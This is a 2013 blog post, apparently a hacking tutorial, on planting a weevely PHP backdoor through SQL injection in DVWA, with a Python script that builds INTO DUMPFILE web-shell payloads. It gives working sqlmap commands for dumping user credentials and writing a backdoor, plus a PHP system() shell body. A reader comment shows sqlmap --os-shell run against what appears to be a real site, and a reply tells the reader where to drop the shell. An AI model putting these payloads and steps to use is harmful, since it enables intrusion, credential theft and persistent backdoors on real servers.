Friday, 5 April 2013

upload backdoor via sql injection

In the previous post I successfully penetrated the website's database; now I'll go to the next level. In this post I'll explain the steps to plant a backdoor through MySQL so I can come back to the system whenever I want. For this experiment I used DVWA (Damn Vulnerable Web Application) installed on localhost. The tools I used are Mantra, sqlmap, DirBuster, and weevely.

First, open DVWA in the web browser. Before logging in, activate the Live HTTP Headers tool (Menu > Tools > Application Auditing > Live HTTP Headers) to capture the cookie and session ID; these will be passed to sqlmap so it can work as the logged-in user and bypass the login.




After logging in, set the DVWA security level to low and go to the SQL Injection menu. Enter a single quote (') to test for SQL injection; the MySQL error message that comes back means the target is vulnerable.



Copy the URL and run sqlmap to enumerate the databases, using the cookie gathered in the previous step.

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" --dbs



After that, find the database and the table that contain the usernames and passwords.


./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" -D dvwa --tables



./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" -D dvwa -T users --dump



Now I have the usernames and (hashed) passwords of all users. Next I'll generate a backdoor to plant on the target. Open weevely and generate the backdoor; it is stored in generate.php and its password is 1234.

./weevely.py generate 1234 generate.php



After the backdoor has been made, I'll upload generate.php to /var/www/dvwa/bdr.php. Under the hood sqlmap does this with a SELECT ... INTO DUMPFILE through the injection, so it only works when the database user has the FILE privilege, secure_file_priv does not block the path, and the destination directory is writable by the MySQL server process (which also means the database must run on the same host as the web root, as it does here).

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" --file-write=/pentest/backdoors/web/weevely/generate.php --file-dest=/var/www/dvwa/bdr.php



Now the backdoor is on the target. Connect to it with weevely:

./weevely.py http://localhost/dvwa/bdr.php 1234



Now we have successfully entered the system through the backdoor, and I can play around with it :)
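The --file-write step is the heart of this post, so here is an added example (editor's code, not from the post, sqlmap or weevely) of what that option does on MySQL: a UNION SELECT ... INTO DUMPFILE injection, together with the checks that decide whether the write can succeed at all (column count, FILE privilege, secure_file_priv). It assumes DVWA's low-level page runs SELECT first_name, last_name FROM users WHERE user_id = '$id' (two columns, single-quoted value); the shell body and the destination path are constructed for illustration.

```python
# Added example (editor's code, not from the post, sqlmap or weevely): what
# sqlmap's --file-write does on MySQL, i.e. a UNION SELECT ... INTO DUMPFILE
# injection, plus the checks that decide whether the write can succeed.
# Assumptions: DVWA's low-level page runs
#   SELECT first_name, last_name FROM users WHERE user_id = '$id'
# (two columns, single-quoted value); the shell body below is a constructed
# stand-in for weevely's generate.php.
import binascii
from typing import Iterable, Optional, Tuple

SAMPLE_BACKDOOR = b"<?php if (isset($_REQUEST['c'])) { system($_REQUEST['c']); } ?>\n"

# Run these through the same injection point before attempting the write.
# information_schema.user_privileges lists the current account's own global
# grants even when mysql.user is not readable; grantee is quoted 'user'@'host'.
PRECONDITION_QUERIES = {
    "privileges": (
        "SELECT privilege_type FROM information_schema.user_privileges "
        "WHERE grantee = CONCAT('''', REPLACE(CURRENT_USER(), '@', '''@'''), '''')"
    ),
    "secure_file_priv": "SELECT @@secure_file_priv",
}


def hex_literal(data: bytes) -> str:
    """Encode bytes as a MySQL 0x... literal so the payload carries no quotes,
    newlines or NUL bytes that would break the injected statement or the URL."""
    return "0x" + binascii.hexlify(data).decode("ascii")


def order_by_probe(param_value: str, n: int) -> str:
    """Column-count probe: the first n for which this errors is one more than
    the number of columns the original SELECT returns (DVWA: errors at 3).
    '-- -' comments out the rest of the statement and, unlike '#', needs no
    URL-encoding in a GET parameter."""
    return f"{param_value}' ORDER BY {n}-- -"


def file_write_payload(column_count: int, data: bytes, dest_path: str,
                       param_value: str = "-1") -> str:
    """Value for the injectable parameter that writes `data` to `dest_path`.

    - param_value defaults to an id that matches no row, so the UNION yields
      exactly one row; DUMPFILE refuses to write more than one.
    - INTO DUMPFILE, not OUTFILE: DUMPFILE writes the row verbatim, with no
      column/line terminators or escaping, so the PHP lands byte-for-byte.
    - The file is created by the mysqld process on the DB host, so the
      directory must be writable by the mysql user, and DB and web root
      must be on the same machine (true for DVWA on localhost).
    """
    if column_count < 1:
        raise ValueError("UNION needs at least one column")
    if "'" in dest_path or "\\" in dest_path:
        raise ValueError("destination path would break out of the quoted literal")
    cols = [hex_literal(data)] + ["NULL"] * (column_count - 1)
    return (f"{param_value}' UNION SELECT {', '.join(cols)} "
            f"INTO DUMPFILE '{dest_path}'-- -")


def preconditions(privileges: Iterable[str], secure_file_priv: Optional[str],
                  dest_path: str) -> Tuple[bool, str]:
    """Interpret the results of PRECONDITION_QUERIES for a given destination.

    secure_file_priv: None (SQL NULL) disables server-side file I/O entirely,
    '' allows any path, a directory confines writes to that directory. MySQL
    5.7.6 and later ship with a non-empty default, which is the usual reason
    --file-write fails on newer installs even as a FILE-privileged user.
    """
    if "FILE" not in {p.upper() for p in privileges}:
        return False, "DB user lacks the global FILE privilege"
    if secure_file_priv is None:
        return False, "secure_file_priv is NULL: server-side file I/O is disabled"
    if secure_file_priv:
        allowed = secure_file_priv.rstrip("/") + "/"
        if not dest_path.startswith(allowed):
            return False, f"secure_file_priv confines writes to {allowed}"
    return True, ("FILE privilege present and path allowed; the directory must "
                  "still be writable by the mysql user")


if __name__ == "__main__":
    # Walk through the write against a DVWA-style two-column query.
    for n in (1, 2, 3):
        print("probe:", order_by_probe("1", n))
    print("write:", file_write_payload(2, SAMPLE_BACKDOOR, "/var/www/dvwa/bdr.php"))
    # Results as they would come back from a stock DVWA (root, no restriction)
    # versus a hardened server with a confined secure_file_priv.
    print(preconditions(["FILE", "SELECT"], "", "/var/www/dvwa/bdr.php"))
    print(preconditions(["SELECT"], "/var/lib/mysql-files/", "/var/www/dvwa/bdr.php"))
```

The two precondition queries are worth running first: if the account lacks FILE or secure_file_priv is set, sqlmap's --file-write will report failure no matter what the injection looks like, and the fix on the defending side is exactly those two settings plus a web root the mysql user cannot write to.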

2 comments:

  1. Yesss, this is exactly what I was looking for, bang Dom2 :D

    Nice share ..!

    Bang Dom2, sorry for scribbling here, I also want to ask something :D
    could you also do a tutorial on uploading a shell with sqlmap?

    sqlmap.py -u http://www.TERGET SQLI.com/view_ad.php?id=503 --os-shell --flush-session

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
    consent is illegal. It is the end user's responsibility to obey all applicable
    local, state and federal laws. Developers assume no liability and are not
    responsible for any misuse or damage caused by this program

    [*] starting at 20:17:15

    [20:20:45] [INFO] flushing session file
    [20:20:45] [INFO] testing connection to the target URL
    [20:20:48] [INFO] testing if the target URL is stable. This can take a couple of seconds
    [20:20:51] [INFO] target URL is stable
    [20:20:51] [INFO] testing if GET parameter 'id' is dynamic

    [20:22:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
    [20:22:48] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
    [20:22:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
    [20:23:01] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
    [20:23:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
    [20:23:34] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
    [20:24:07] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
    [20:24:25] [INFO] testing 'MySQL >= 5.0 time-based blind - Parameter replace'
    [20:24:55] [INFO] testing 'MySQL < 5.0 time-based blind - Parameter replace (heavy queries)'
    [20:24:56] [INFO] testing 'MySQL time-based blind - Parameter replace (bool*int)'
    sqlmap identified the following injection points with a total of 35 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=22 AND 7853=7853

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=22 AND (SELECT 6876 FROM(SELECT COUNT(*),CONCAT(0x7165647171,(SELECT (CASE WHEN (6876=6876) THEN 1 ELSE 0 END)),0x7161727371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: id=22 UNION ALL SELECT NULL,NULL,CONCAT(0x7165647171,0x4e6248416e5444576755,0x7161727371),NULL,NULL#
    ---
    [20:28:17] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux CentOS 5.8
    web application technology: PHP 5.2.6, Apache 2.2.3
    back-end DBMS: MySQL 5.0
    [20:28:17] [INFO] going to use a web backdoor for command prompt
    [20:28:17] [INFO] fingerprinting the back-end DBMS operating system
    [20:28:18] [INFO] the back-end DBMS operating system is Linux
    which web application language does the web server support?
    [1] ASP
    [2] ASPX
    [3] JSP
    [4] PHP (default)
    >
    >4
    [20:29:39] [WARNING] unable to retrieve automatically the web server document root
    what do you want to use for web server document root?
    [1] common location(s) '/var/www/' (default)
    [2] custom location
    [3] custom directory list file
    [4] brute force search
    --------------------------------------------------------------------------------------------------
    This is the part I'm confused about ..! Please explain it, bang :D

    Replies
    1. Choose the location on your target where you want the shell to be saved.